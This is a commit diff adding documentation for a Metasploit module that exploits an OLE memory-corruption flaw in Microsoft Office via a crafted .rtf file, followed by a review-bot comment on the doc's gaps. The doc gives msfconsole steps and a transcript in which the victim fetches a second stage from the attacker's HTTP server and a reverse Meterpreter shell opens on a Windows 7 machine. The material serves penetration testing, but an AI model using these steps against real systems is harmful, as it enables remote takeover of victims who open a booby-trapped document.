Commit fcf2cfa

Author: Austin
Create office_ms17_11882.md
1 parent f7e2fb3 commit fcf2cfa

1 file changed: 56 additions & 0 deletions
@@ -0,0 +1,56 @@
1+
Office products within the last 17 years allow an attacker to execute arbitrary commands through memory corruption in Office documents. This occurs in how MS office fails to properly handle OLE objects in memory. Requires an victim
2+
to open an MS `.rtf` file. In addition for the payload to be executed, the user must not open as read-only. Otherwise requires no interaction beyond that from the user.
3+
4+
## Vulnerable Application
5+
6+
- Microsoft Office 2016
7+
- Microsoft Office 2013 Service Pack 1
8+
- Microsoft Office 2010 Service Pack 2
9+
- Microsoft Office 2007
10+
11+
## Verification Steps
12+
13+
1. Start msfconsole
14+
2. Do: `use exploit/windows/fileformat/office_ms17_11882`
15+
3. Do: `set PAYLOAD [PAYLOAD]`
16+
4. Do: `run`
17+
18+
## Options
19+
### FILENAME
20+
Filename to output, and location to which should be written.
21+
22+
23+
## Example
24+
25+
```
26+
msf > use exploit/windows/fileformat/office_ms17_11882
27+
msf exploit(office_ms17_11882) > set FILENAME /home/mumbai/file.rtf
28+
FILENAME => /home/mumbai/file.rtf
29+
msf exploit(office_ms17_11882) > set LHOST ens3
30+
LHOST => ens3
31+
msf exploit(office_ms17_11882) > set LPORT 35116
32+
LPORT => 35116
33+
msf exploit(office_ms17_11882) > run
34+
[*] Exploit running as background job 0.
35+
36+
[*] Started reverse TCP handler on 192.168.0.11:35116
37+
msf exploit(office_ms17_11882) > [*] Using URL: http://0.0.0.0:8080/e08qBLfVxgaJZPo
38+
[*] Local IP: http://192.168.0.11:8080/e08qBLfVxgaJZPo
39+
[*] Server started.
40+
[*] 192.168.0.24 office_ms17_11882 - Handling initial request from 192.168.0.24
41+
[*] 192.168.0.24 office_ms17_11882 - Stage two requestd, sending
42+
[*] Sending stage (205379 bytes) to 192.168.0.24
43+
[*] Meterpreter session 1 opened (192.168.0.11:35116 -> 192.168.0.24:52217) at 2017-11-21 14:41:59 -0500
44+
sessions -i 1
45+
[*] Starting interaction with 1...
46+
47+
meterpreter > sysinfo
48+
Computer : TEST-PC
49+
OS : Windows 7 (Build 7601, Service Pack 1).
50+
Architecture : x64
51+
System Language : en_US
52+
Domain : WORKGROUP
53+
Logged On Users : 1
54+
Meterpreter : x64/windows
55+
meterpreter >
56+
```
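
Review bot: The Verification Steps (added lines 13-16) do not match the Example that follows them. The example sets FILENAME, LHOST and LPORT before `run`, while the steps only set a payload, and no step covers opening the generated `.rtf` on the test machine or the result to expect (the transcript ends with a Meterpreter session). Suggest adding those steps so the procedure can be followed without reading the transcript. The Options section documents only FILENAME, yet the example output shows the module starting an HTTP server on port 8080 (`[*] Server started.`) and answering a "Stage two" request, so the options that control that listener should be documented too. In the opening paragraph, `Requires an victim` is split across added lines 1-2 and should read as one sentence ("Requires a victim to open ..."). The Vulnerable Application list would also be more useful if it stated which Office version was used for the Windows 7 SP1 x64 run shown in the example.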
